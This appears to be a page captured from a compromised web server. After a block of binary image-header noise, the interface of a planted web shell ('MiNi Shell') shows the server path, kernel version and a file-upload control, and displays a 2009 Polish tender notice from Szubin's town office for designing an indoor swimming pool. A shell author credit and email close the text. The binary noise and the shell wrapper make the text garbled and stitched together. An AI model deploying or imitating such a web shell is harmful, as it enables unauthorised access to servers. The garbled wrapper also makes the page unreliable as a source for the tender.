JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090723/250986-N-2009.html

<p class="kh_header"><b>Szubin: OPRACOWANIE DOKUMENTACJI PRJEKTOWEJ NA BUDOWĘ KRYTEGO BASENU NA TERENIE DZIAŁEK Nr 30/50, 30/45, 30/40, 30/31 W SZUBINIE</b><br>
<b>Numer ogłoszenia: 250986 - 2009; data zamieszczenia: 23.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Szubinie , ul. Kcyńska 12, 89-200 Szubin, woj. kujawsko-pomorskie, tel. 052 3910700, 3910701.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.szubin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE DOKUMENTACJI PRJEKTOWEJ NA BUDOWĘ KRYTEGO BASENU NA TERENIE DZIAŁEK Nr 30/50, 30/45, 30/40, 30/31 W SZUBINIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej na budowę krytego basenu wraz z niezbędną infrastrukturą towarzyszącą na terenie działek 
nr 30/50, 30/45, 30/40, 30/31 w Szubinie
1.	Na przedmiot zamówienia składa się:
1)	Przygotowanie dokumentów do wniosku o wydanie decyzji o środowiskowych uwarunkowaniach realizacji przedsięwzięcia.
2)	Uzyskanie w imieniu Zamawiającego decyzji o środowiskowych uwarunkowaniach realizacji przedsięwzięcia.
3)	Opracowanie projektu rozbiórki kolidujących obiektów budowlanych.
4)	Przed opracowaniem dokumentacji projektowej wykonawca sporządzi koncepcję obiektu będącego przedmiotem zamówienia.
Na podstawie zaakceptowanej i odebranej przez zamawiającego ww koncepcji wykonawca przystąpi do opracowania dokumentacji projektowej na budowę basenu.
5)	Opracowanie projektów budowlanych w zakresie uwzględniającym specyfikę robót budowlanych, które muszą obejmować co najmniej:
a)	Branżę budowlano - architektoniczną,
b)	Branżę konstrukcyjną,
c)	Oświetlenie terenu sterowane za pomocą wyłącznika zmierzchowego,
d)	Drogi, chodniki, parkingi, zieleń
e)	Przyłącza energii elektrycznej, wody, gazu, kanalizacyjne oraz do miejskiej sieci ciepłowniczej,
f)	Instalacje: - wody, kanalizacji, gazu,  elektryczna; w tym: instalacja oświetlenia podstawowego, instalacja oświetlenia miejscowego, instalacja oświetlenia awaryjnego, instalacja gniazd wtykowych 230 V, zasilanie urządzeń  technologicznych, instalacja siłowa, instalacja ochrony przepięciowej, instalacja ochrony od porażeń, instalacja odgromowa, komputerowa, telewizji dozorowej, rozgłaszania przewodowego - radiowęzła, instalacja alarmowa - sygnalizacja włamania i napadu, instalacja przeciwpożarowa, wentylacyjna z częściowym odzyskiem ciepła, klimatyzacji, centralnego ogrzewania, teletechniczna, sygnalizacji wyników, system kontroli i rozliczania czasu pobytu na basenie zintegrowany z innymi pomieszczeniami obiektu
g)	Odwodnienie terenu - drenaże, kanalizacja deszczowa, odwodnienie powierzchniowe wg. potrzeb,
h)	Technologię uzdatniania wody - zamawiający przewiduje chlorowanie,
i)	Technologia ogrzewania - zintegrowany system grzewczy zaopatrujący obiekt w niezbędną energię cieplną. W ramach projektowanego systemu grzewczego należy przewidzieć wyposażenie obiektu w alternatywne źródła energii cieplnej, w tym: - pompy ciepła generujące ciepło przy temperaturze zewnętrznej do minus 25 stc.C; - zestaw próżniowych kolektorów słonecznych do zamontowania na dachu od strony południowej; - urządzenia odzysku energii (ciepła i chłodu) w centralach wentylacyjnych; - inne urządzenia; - kotłownia na gaz ziemny lub ciepło z miejskiej sieci ciepłowniczej.
Rozwiązania technologii ogrzewania muszą być poprzedzone analizą finansową, obrazującą koszty ogrzewania przy zastosowaniu odnawialnych źródeł ciepła, systemu mieszanego oraz konwencjonalnej kotłowni na gaz ziemny, z uwzględnieniem prognozy zużycia energii cieplnej i analizy zwrotu kosztów inwestycji w powiązaniu z kosztami eksploatacji.
6)	Opracowanie projektu wystroju wnętrz i wyposażenia.
7)	Opracowania projektów na wykonanie parkingów dróg dojazdowych w tym wykonanie (na terenie działki nr 30/40) jezdni i chodników łączącej 
ul. Kochanowskiego i ul. Browarną 
8)	Wystąpienie o wydanie warunków przyłączenia do sieci wodociągowej, kanalizacyjnej, gazowej, elektroenergetycznej, cieplnej.
9)	Instrukcja bhp,  p-poż i inne wymagane przepisami praw dla tego rodzaju obiektów.
10)	Uzyskanie niezbędnych uzgodnień i zezwoleń.
11)	Opracowanie przedmiaru robót i kosztorysu inwestorskiego na rozbiórkę istniejących budynków.
12)	Opracowanie przedmiaru robót i kosztorysu inwestorskiego podzielone na poszczególne branże z wyliczeniem ilości.
13)	Opracowanie projektu budowlanego.
14)	Opracowanie projektu wykonawczego.
15)	Opracowanie informacji dotyczącej planu bezpieczeństwa i ochrony zdrowia
16)	Opracowanie specyfikacji technicznej wykonania i odbioru robót budowlanych
17)	Uzyskanie w imieniu Zamawiającego pozwolenia na budowę.
18)	Sprawowanie nadzoru autorskiego - przyjmuje się 5 pobytów projektanta na budowie.

2.	Charakterystyczne orientacyjne parametry określające wartość obiektu:
1)	Powierzchnia użytkowa 1800 - 2000 m2,
2)	Ilość kondygnacji
a)	1 kondygnacja podziemna,
b)	2 kondygnacje nadziemne,
3)	Pojemność hali basenowej ok. 80 osób,
4)	Pojemność zaplecza fitness ok. 40 osób,
5)	Powierzchnia użytkowa fitness, siłowni wraz z zapleczem min. 350 m2,
6)	Pojemność widowni max. do 90 osób,
7)	Powierzchnia wody ok. 500 m2, w tym:
a)	Basen pływacki 12,5 x 25 m -312,5 m2,
b)	Basen rekreacyjny, tj. basen do nauki pływania, brodzik dla dzieci, dzika rzeka - ok. 150 m2,
c)	Dwa jacuzzi,
d)	Zjeżdżalnia wodna ok. 70m wraz z hamownią.

3.	Opis wymagań Zamawiającego w stosunku do przedmiotu zamówienia:
1)	Koncepcja musi zawierać: rzut kondygnacji, elewacje wraz z kolorystyką, opis zastosowanych materiałów do budowy basenu, plan zagospodarowania, opis i schemat technologii uzdatniania wody. Koncepcję należy opracować w wersji papierowej - plansza w skali 1:100 oraz w wersji elektronicznej 

2)	Dokumentację projektową należy opracować zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2004 r. Nr 202, poz. 2072 ze zm.).

3)	Projekt zagospodarowania terenu musi obejmować cały kompleks
z uwzględnieniem dróg wewnętrznych, chodników, parkingów, oświetlenia terenu, sieci infrastruktury technicznej, w tym wod.-kan., c.o., energetycznej, gazowej, odwodnienia, systemu monitoringu. Projekt zagospodarowania terenu musi być poprzedzony opracowaniem koncepcji.

4)	Niecki basenu należy zaprojektować jako samonośny monolit z wysokiej jakości stali nierdzewnej 1.4404 (AISI 316L) bez okładzin foliowych, składający się z prefabrykowanych modułów łączonych poprzez szczelne spawanie w osłonie argonu, bezpośrednio na miejscu montażu. Ściany niecki przytwierdzone będą do ławy fundamentowej bądź płyty fundamentowej w zależności od miejscowych warunków gruntowych. Dno niecki ma być wykonane z płyt ze stali nierdzewnej i układane bezpośrednio na zagęszczonym warstwowo podkładzie z materiałów sypkich.

5)	Projekt musi zakładać przystosowanie obiektu do użytkowania przez osoby niepełnosprawne.

6)	Dokumentacja projektowa musi zawierać w opisie wszystkie dane stanowiące podstawę do przyjętych rozwiązań projektowych.

7)	Przedmiot zamówienia musi zawierać wszystkie niezbędne uzgodnienia
w szczególności decyzje o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, pozwolenie wodnoprawne oraz zostać zatwierdzona pozwoleniem na budowę. Wszelkie opłaty z tym związane ponosi Wykonawca.

8)	Projekt musi być wykonany zgodnie z przepisami Prawa budowlanego - ustawa z dnia 7 lipca 1994 r. (tj. Dz. U. z 2006 r. Nr 156, poz. 1118 z późn. zm.); Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. (Dz. U.
z 3003 r. Nr 120, poz. 1133) w sprawie szczegółowego zakresu i formy projektu budowlanego oraz Rozporządzeniem Ministra Infrastruktury z dnia
2 września 2004 r. (Dz. U. Nr 202, poz. 2072 z późn. zm.) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego.

9)	Projekt wystroju wnętrz i wyposażenia - poza częścią rysunkową wskazującą lokalizację poszczególnych elementów wyposażenia oraz częścią opisową musi zawierać zestawienie wyposażenia z określeniem ilości, cech szczególnych i parametrów tj. wymiarów elementów oraz parametrów umożliwiających jednoznaczne dokonanie zamówienia wyposażenia - rodzaje materiałów, oklein, kolory tapicerek, dane techniczne, jednak bez podania nazw własnych i producentów, a także rysunki techniczne nietypowych elementów wyposażenia.

10)	Projekt wystroju wnętrz musi zawierać:
a)	rysunki kolorystyki ścian i  podłóg hali basenowej oraz zaplecza wraz z opisem zastosowanych materiałów i ich kolorów,
b)	rysunki kolorystyki ścian i podłóg holu głównego wraz z opisem zastosowanych materiałów i ich kolorów,
c)	opis zastosowanych materiałów wraz z ich kolorystyką w pozostałych pomieszczeniach,

11)	Instrukcja bhp i p-poż. I inne wymagane przepisami prawa dla tego rodzaju obiektów - 1 egz. - uzgodniona przez rzeczoznawcę ds. p-poż. musi zawierać, poza częścią opisową i rysunkową, wykaz niezbędnego wyposażenia p-poż. I oznakowania z opisem i podaniem ilości oraz miejsca montażu.

12)	Opracowanie kosztowe, podzielone na części uzgodnione z Zamawiającym,
w skład których wchodzą: kosztorysy inwestorskie szczegółowe
z zestawieniem materiałów i sprzętu, kosztorysy nakładcze (szczegółowe bez cen), kosztorysy uproszczone ofertowe, kosztorys kosztów wyposażenia, zbiorcze zestawienie kosztów (ZZK),

13)	Kosztorys inwestorski i przedmiar robót określający planowane koszty robót budowlanych należy opracować zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robot budowlanych określanych
w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389 ze zm.). 

14)	Raport o oddziaływaniu przedsięwzięcia na środowisko należy opracować zgodnie z ustawą o udostępnianiu informacji o środowisku i jego ochronie, udziale  społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko z dnia 3 października 2008 r. (Dz. U. z 2008r. Nr 199, poz. 1227).

15)	Dokumentację projektową z wyjątkiem projektu budowlanego należy opracować w 2 egzemplarzach natomiast projekt budowlany w 5 egz. Opracowania określone w pkt. 1 należy dostarczyć w formie papierowej
i elektronicznej (pliki w formacie otwartym np. PDF, jpg., na  cyfrowym nośniku CD lub inny)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:
1)	Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2)	Posiadający niezbędną wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3)	Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4)	Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 i 2 Pzp.
5)	Wykonawcy, których oferta będzie zawierała wszystkie dokumenty określone w pkt VI niniejszej SIWZ.
6)Wykonawcy, którzy zaakceptują warunki zawarte we wzorze umowy. 

2.	Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie
w oparciu o dokumenty złożone przez wykonawcę w niniejszym.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na ofertę składają się następujące dokumenty i załączniki:

1)	Formularz ofertowy-wypełniony i podpisany przez wykonawcę-załącznik nr 1,
2)	Zaparafowany wzór umowy - załącznik nr 2,
3)	Dowód wniesienia wadium,

2. W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:

1)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2)	Pełnomocnictwo do reprezentowania przed zamawiającym w postępowaniu
o udzielenie zamówienia oraz do zawarcia umowy (jeżeli wykonawca mocuje pełnomocnika);
3)	Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
4)	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu
z art. 22 Prawa zamówień publicznych - załącznik nr 3. 
3. W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: 

1)	Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Wykonawca winien przedstawić kserokopię uprawnień do wykonywania samodzielnych funkcji technicznych
w budownictwie do projektowania bez ograniczeń w specjalności architektonicznej, konstrukcyjno - budowlanej, sanitarnej, elektrycznej, wentylacyjnej oraz aktualne na dzień składania ofert zaświadczenie
o przynależności do właściwego samorządu zawodowego.
2)	Dokumenty (referencje) potwierdzające, że wykonawca wykonał w okresie ostatnich trzech lat przed wszczęciem postępowania przynajmniej dwie usługi
o zakresie odpowiadającym przedmiotowi zamówienia, tj. wykonał dwie dokumentacje projektowe na budowę krytych pływalni.
3)	Wykaz prac, które wykonawca zamierza powierzyć podwykonawcom
z podaniem ich wartości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.szubin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Szubinie, ul. Kcyńska 12, 89-200 Szubin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2009 godzina 10:00, miejsce: Urząd Miejski w Szubinie, ul. Kcyńska 12, 89-200 Szubin, sekretariat (pokój nr 19).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com